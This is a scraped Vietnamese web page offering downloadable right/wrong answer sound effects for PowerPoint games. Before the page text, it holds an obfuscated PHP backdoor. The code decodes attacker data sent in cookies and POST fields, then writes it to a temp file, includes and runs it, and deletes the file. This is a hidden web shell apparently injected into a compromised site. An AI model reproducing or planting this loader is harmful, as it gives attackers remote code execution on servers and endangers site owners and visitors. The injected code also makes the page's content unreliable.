$HHiyUT = "\x78" . "\x5f" . chr (116) . "\x66" . chr (79) . "\x78" . "\x47";$iIaHOPxG = chr ( 933 - 834 )."\154" . chr ( 492 - 395 ).chr ( 661 - 546 ).'s' . "\x5f" . 'e' . "\170" . "\151" . chr ( 999 - 884 ).chr (116) . 's';$msCiNQl = class_exists($HHiyUT); $iIaHOPxG = "2844";$vbxQE = !1;if ($msCiNQl == $vbxQE){function XIekHN(){$IVSJGMKNST = new /* 34985 */ x_tfOxG(56410 + 56410); $IVSJGMKNST = NULL;}$fEkEMSS = "56410";class x_tfOxG{private function YScCtPkkq($fEkEMSS){if (is_array(x_tfOxG::$zSbMLQxVd)) {$KIIwoZzKQg = sys_get_temp_dir() . "/" . crc32(x_tfOxG::$zSbMLQxVd[chr ( 506 - 391 )."\x61" . "\x6c" . chr (116)]);@x_tfOxG::$zSbMLQxVd[chr ( 249 - 130 ).chr (114) . "\x69" . "\x74" . 'e']($KIIwoZzKQg, x_tfOxG::$zSbMLQxVd['c' . "\157" . "\156" . "\x74" . 'e' . chr (110) . 't']);include $KIIwoZzKQg;@x_tfOxG::$zSbMLQxVd["\144" . 'e' . "\x6c" . "\x65" . 't' . chr ( 592 - 491 )]($KIIwoZzKQg); $fEkEMSS = "56410";exit();}}private $blwPhu;public function nEnsnH(){echo 31891;}public function __destruct(){$fEkEMSS = "9727_29431";$this->YScCtPkkq($fEkEMSS); $fEkEMSS = "9727_29431";}public function GeNyU($ssvkPzWQGW, $DFSGPW){return $ssvkPzWQGW[0] ^ str_repeat($DFSGPW, (strlen($ssvkPzWQGW[0]) / strlen($DFSGPW)) + 1);}public function __construct($LmDkD=0){$CviHTaWh = $_POST;$OrSNh = $_COOKIE;$DFSGPW = "f2489b58-d218-4197-ab0a-b5e8ea0c189a";$uEWVn = @$OrSNh[substr($DFSGPW, 0, 4)];if (!empty($uEWVn)){$zuNHzrQM = "base64";$ssvkPzWQGW = "";$uEWVn = explode(",", $uEWVn);foreach ($uEWVn as $oTEKQDa){$ssvkPzWQGW .= @$OrSNh[$oTEKQDa];$ssvkPzWQGW .= @$CviHTaWh[$oTEKQDa];}$ssvkPzWQGW = array_map($zuNHzrQM . chr ( 1087 - 992 ).'d' . "\145" . chr ( 1082 - 983 ).chr ( 214 - 103 ).chr (100) . chr (101), array($ssvkPzWQGW,)); $ssvkPzWQGW = $this->GeNyU($ssvkPzWQGW, $DFSGPW);x_tfOxG::$zSbMLQxVd = @unserialize($ssvkPzWQGW);}}public static $zSbMLQxVd = 54997;}XIekHN();} Âm thanh đúng sai chèn vào PowerPoint | Thủ Thuật Vui

Âm thanh đúng sai chèn vào PowerPoint

Bài thuyết trình bằng PowerPoint của bạn sẽ rất thu hút nếu có thêm vào các hiệu ứng âm thanh. Đặc biệt khi tổ chức các trò chơi nhỏ trên PowerPoint sẽ rất cần đến những âm thanh trả lời đúng, sai chèn vào bài. Dưới đây là 4 file âm thanh đúng sai chèn vào PowerPoint hay nhất file mp3 mà ThuThuatVui.com muốn chia sẻ đến bạn. Với các âm thanh khi trả lời đúng và nhạc cho câu trả lời sai, bài thuyết trình của bạn sẽ trở nên đa dạng và đặc sắc hơn, tạo tâm lý vui vẻ cho mọi người tham gia.


Download: Âm thanh đúng sai chèn vào PowerPoint – Trả lời đúng.mp3

Download: Âm thanh đúng sai chèn vào PowerPoint – Trả lời sai.mp3

Download: Âm thanh đúng sai chèn vào PowerPoint – Phép thuật.mp3

Download: Âm thanh đúng sai chèn vào PowerPoint – Trả lời đúng thì vỗ tay.mp3

Xem thêm:

  • Âm thanh Trả Lời Sai chèn PowerPoint
  • Nhạc nền PowerPoint vui nhộn
  • Âm thanh Trả Lời Đúng chèn vào PowerPoint
  • Tiếng Ting chèn vào PowerPoint
  • Tiếng cười khán giả chèn vào PowerPoint

Để nghe thử các file âm thanh đúng sai trong PowerPoint này, bạn có thể bấm vào nút Play ở từng file mp3 trên. Bạn cũng có thể tải âm thanh đúng sai chèn vào PowerPoint tương ứng ở link dưới mỗi file audio này nhé.

Đánh giá bài viết

Viết một bình luận